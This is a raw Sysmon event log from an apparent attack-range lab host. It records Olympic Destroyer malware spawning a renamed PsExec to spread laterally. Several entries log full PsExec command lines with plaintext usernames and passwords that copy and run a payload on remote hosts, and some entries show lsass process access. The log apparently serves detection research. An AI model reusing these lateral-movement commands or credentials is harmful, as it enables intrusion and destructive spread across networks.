10:56:49.467{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A005-000000003802}2956C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.467{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.467{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.467{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.467{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A105-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.467{C8EA50B7-12F1-6216-A005-000000003802}29567160C:\Windows\system32\conhost.exe{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.445{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.445{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.445{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.445{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A005-000000003802}2956C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.430{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A005-000000003802}2956C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:49.430{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.398{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-9F05-000000003802}6952C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.398{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-9F05-000000003802}6952C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.383{C8EA50B7-12F1-6216-9F05-000000003802}69527080C:\Windows\system32\conhost.exe{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.362{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-9F05-000000003802}6952C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.345{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-9F05-000000003802}6952C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.314{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.314{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.315{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.314{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-9E05-000000003802}7136C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.230{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.230{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.230{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.230{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.230{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.230{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.234{C8EA50B7-12F1-6216-9D05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 